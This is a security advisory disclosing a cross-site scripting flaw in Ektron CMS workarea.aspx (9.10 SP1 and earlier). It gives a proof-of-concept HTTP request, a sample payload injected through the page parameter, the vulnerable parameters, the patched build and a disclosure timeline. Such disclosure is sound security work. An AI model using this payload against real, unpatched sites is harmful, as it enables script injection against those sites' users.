Vulnerability type: Cross-site Scripting

Vendor: http://www.ektron.com/

Product: Ektron Content Management System

Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.102)

Patched version: 9.10 SP1 (Build 9.1.0.184.1.114)

Credit: Jerold Hoong

PROOF OF CONCEPT (XSS)

Cross-site scripting (XSS) vulnerability in workarea.aspx in Ektron CMS 9.10 SP1
on build 9.1.0.184.1.102 and earlier allows remote authenticated users to inject
arbitrary javascript via the page, action, folder_id and LangType parameters.

GET /Test/WorkArea/workarea.aspx?page=content.aspx%27%3balert
%28%22XSS%22%29%2f%2f&action=ViewContentByCategory&folder_id=0
&LangType=1033 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
… [SNIP] …
Cookie: EktGUID=014949ec-36ac-4b89-9c0b-8b03ed29b0ed; EkAnalytics=0;
ASP.NET_SessionId=zxucmt5zyugbtwrm4vseakw5;
… [SNIP] …

VULNERABLE PARAMETERS:

• page
• action
• folder_id
• LangType

SAMPLE PAYLOAD

• ';alert("XSS")//

TIMELINE

– 07/04/2015: Vulnerability found
– 07/04/2015: Vendor informed
– 08/04/2015: Vendor responded and acknowledged
– 28/05/2015: Vendor fixed the issue
– 31/05/2015: Public disclosure